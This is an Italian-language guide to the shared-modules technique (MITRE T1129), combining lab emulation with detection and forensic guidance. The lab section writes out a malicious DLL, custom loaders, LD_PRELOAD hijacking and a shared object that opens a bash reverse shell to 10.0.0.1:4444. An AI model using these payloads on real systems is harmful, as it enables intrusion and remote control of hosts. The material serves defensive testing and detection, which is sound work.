Moduli Condivisi: Shared Modules (T1129)

Per testare questa tecnica in laboratorio, partiamo dalla creazione di un modulo malevolo minimale. Su Windows, compiliamo una DLL che esegue calc.exe quando caricata:

// malicious.c
#include <windows.h>
BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpReserved) {
    if (fdwReason == DLL_PROCESS_ATTACH) {
        system("calc.exe");
    }
    return TRUE;
}

Compilazione: cl /LD malicious.c

Il caricamento può avvenire tramite diversi vettori. Il più diretto utilizza rundll32: rundll32.exe malicious.dll,DllMain

Per simulare tecniche più sofisticate come quelle di Mustang Panda, creiamo un loader custom che utilizza LoadLibrary:

// loader.c
#include <windows.h>
int main() {
    HMODULE hModule = LoadLibrary("C:\\Temp\\malicious.dll");
    if (hModule) {
        typedef void (*FuncPtr)();
        FuncPtr func = (FuncPtr)GetProcAddress(hModule, "ExecutePayload");
        if (func) func();
    }
    return 0;
}

Su Linux, l'approccio con dlopen è altrettanto efficace. Creiamo un modulo condiviso che stabilisce una reverse shell:

// payload.c
#include <stdlib.h>
void __attribute__((constructor)) init() {
    system("bash -i >& /dev/tcp/10.0.0.1/4444 0>&1");
}

Compilazione: gcc -shared -fPIC payload.c -o payload.so

Il caricamento può avvenire tramite LD_PRELOAD per hijacking di processi esistenti: LD_PRELOAD=/tmp/payload.so ls

Per replicare tecniche più avanzate come quelle di OSX_OCEANLOTUS.D, utilizziamo dlopen programmaticamente:

// loader.c
#include <dlfcn.h>
void* handle = dlopen("/tmp/payload.so", RTLD_LAZY);
if (handle) {
    void (*func)() = dlsym(handle, "execute");
    if (func) func();
}

Su macOS, la sintassi è simile ma utilizziamo file .dylib. Un test particolarmente interessante coinvolge il caricamento da percorsi non standard come ~/Library/LaunchAgents/, simulando persistence.

Per tecniche avanzate, considerate il reflective DLL injection che non richiede scrittura su disco, rendendo la detection ancora più complessa.

La detection di moduli condivisi malevoli richiede un approccio multi-livello che bilanci efficacia e rumore. Il cuore della strategia sta nel monitorare il caricamento di librerie da percorsi sospetti combinato con indicatori comportamentali.

Su Windows, Sysmon fornisce visibilità granulare con l'evento ID 7 (Image/DLL Loaded). Una regola base monitora caricamenti da directory scrivibili:

<RuleGroup groupRelation="or">
    <ImageLoaded condition="begin with">C:\Users\</ImageLoaded>
    <ImageLoaded condition="begin with">C:\ProgramData\</ImageLoaded>
    <ImageLoaded condition="contains">\AppData\Local\Temp\</ImageLoaded>
</RuleGroup>

L'aspetto critico è correlare questi eventi con altri indicatori. Quando un processo carica una DLL da %TEMP% e nei successivi 5 minuti stabilisce connessioni di rete, il rischio aumenta esponenzialmente. Implementate questa correlazione nel SIEM.

Per ridurre i falsi positivi, verificate la firma digitale delle DLL caricate. Windows CodeIntegrity log (Event ID 3033/3034) fornisce informazioni sulla validità delle firme. DLL non firmate o con firme invalide da percorsi utente meritano investigation immediata.

Su Linux, auditd cattura le chiamate dlopen monitorando la syscall openat con flag specifici: auditctl -a always,exit -F arch=b64 -S openat -F a2=0x80000 -k shared_lib_load

Un pattern ad alto rischio coinvolge LD_PRELOAD. Monitorate i processi che partono con questa variabile d'ambiente settata, specialmente se punta a /tmp o /dev/shm:

auditctl -a always,exit -F arch=b64 -S execve -C auid!=euid -F key=ld_preload

La behavioral analysis è fondamentale. Moduli legittimi raramente: vengono scritti poco prima del caricamento, risiedono in directory temporanee, o triggherano immediata attività di rete. Configurate detection chain che cerchino questa sequenza.

Per macOS, Endpoint Security framework fornisce eventi ES_EVENT_TYPE_NOTIFY_MMAP quando vengono mappati file eseguibili. Filtrate per estensioni .dylib e .so da percorsi non standard come ~/Library.

Un approccio efficace combina allowlisting con anomaly detection. Mantenete un baseline di moduli normalmente caricati per processo e alertate su deviazioni, specialmente per processi critici come lsass.exe o sshd.

La ricostruzione di attacchi basati su moduli condivisi richiede l'analisi di artefatti multipli per tracciare il ciclo di vita completo: creazione, caricamento ed esecuzione del modulo malevolo.

Su Windows, il punto di partenza è il Prefetch. Quando viene caricata una DLL, Windows aggiorna il file .pf del processo host con il percorso completo. Analizzate C:\Windows\Prefetch\RUNDLL32.EXE-*.pf per identificare DLL sospette caricate tramite questo LOLBin comune.

L'AmCache (C:\Windows\appcompat\Programs\Amcache.hve) registra l'esecuzione di nuove DLL con timestamp e hash SHA1. Questo è particolarmente utile per moduli che vengono eliminati dopo l'uso. La chiave Root\InventoryApplicationFile contiene entries per ogni DLL eseguita.

Il ShimCache fornisce evidenze complementari sull'esecuzione. Anche se il modulo viene caricato ma non eseguito direttamente, appare comunque nel registro di compatibilità applicazioni. Correlatelo con l'AmCache per validare la timeline.

Per tracciare la creazione del modulo, analizzate il USN Journal. Cercate eventi di creazione file (0x00000100) per estensioni .dll/.so/.dylib in directory temporanee o utente. Il timestamp USN precede tipicamente il caricamento di pochi minuti.

Su Linux, i log di auditd sono essenziali. Gli eventi SYSCALL per open con flag O_RDONLY su file .so indicano potenziali caricamenti:

type=SYSCALL msg=audit(1234567890.123:456): arch=c000003e syscall=257 success=yes exit=3 a0=ffffff9c a1=7ffd12345678 a2=80000 a3=0
type=PATH msg=audit(1234567890.123:456): item=0 name="/tmp/malicious.so"

La memoria del processo può contenere tracce anche dopo l'unload del modulo. Strings analysis della memoria dump spesso rivela percorsi di librerie caricate e simboli esportati. Tools come Volatility con il plugin linux_proc_maps mostrano mappature di memoria inclusi moduli condivisi.

Per ricostruire l'attività post-caricamento, correlate con network forensics. Moduli malevoli spesso iniziano comunicazioni C2 immediatamente dopo il load. PCAP analysis nel timeframe del caricamento può rivelare beacon o data exfiltration.

Su macOS, il Unified Log contiene entries dettagliate su dyld operations. Filtrate per il processo "dyld" e cercate messaggi contenenti "dlopen" o percorsi a .dylib sospette. I crash reports in /Library/Logs/DiagnosticReports possono contenere stack traces che mostrano moduli caricati al momento del crash.

Mustang Panda rappresenta l'unico gruppo APT documentato che utilizza esplicitamente questa tecnica attraverso LoadLibrary. Questo attore cinese, attivo dal 2012, predilige campagne di cyber-espionage contro entità governative del Sud-Est asiatico. L'uso di moduli condivisi si inserisce nel loro approccio modulare al malware deployment.

L'analisi del software malevolo che implementa T1129 rivela pattern distintivi. gh0st RAT, uno dei RAT cinesi più longevi, utilizza il caricamento dinamico di DLL per estendere funzionalità post-compromissione. Questo design modulare permette agli operatori di caricare solo i componenti necessari, riducendo l'impronta forense.

Stuxnet e KillDisk rappresentano due estremi nell'uso di questa tecnica. Mentre Stuxnet chiamava LoadLibrary per eseguire export specifici da DLL in un attacco altamente mirato, KillDisk utilizza lo stesso meccanismo per distruzione indiscriminata. Questa versatilità rende la tecnica attraente per obiettivi diversi.

OSX_OCEANLOTUS.D dimostra l'adattamento cross-platform della tecnica. Il gruppo vietnamita OceanLotus utilizza dlopen() e dlsym() per caricare dinamicamente librerie .dylib su macOS, mantenendo la stessa filosofia modulare dei loro impianti Windows. Questo indica una standardizzazione nelle TTP attraverso piattaforme diverse.

L'evoluzione verso tecniche più sofisticate è evidente in PipeMon, che implementa reflective loading evitando completamente la scrittura su disco. FoggyWeb porta questa sofisticazione ancora oltre, caricando moduli direttamente negli Application Domain di AD FS compromessi.

Pattern emergenti includono l'uso di loader intermedi come BOOSTWRITE che utilizza API legittime (DWriteCreateFactory) per mascherare il caricamento malevolo. Bumblebee tenta di caricare GdiPlus.dll, sfruttando nomi di librerie Windows legittime per evitare detection.

La geografia degli attori che utilizzano questa tecnica mostra concentrazione in APT dell'Asia orientale, con capacità tecniche avanzate e focus su persistenza a lungo termine. L'overlap nei tool suggerisce possibile condivisione di codice o sviluppatori comuni tra gruppi.

Tecnica documentata nel framework MITRE ATT&CK con codice T1129. Le campagne descritte derivano da threat intelligence report di Mustang Panda e analisi malware di gh0st RAT, Stuxnet, OSX_OCEANLOTUS. Detection strategies basate su Sysmon configuration guidance e auditd best practices per enterprise environments.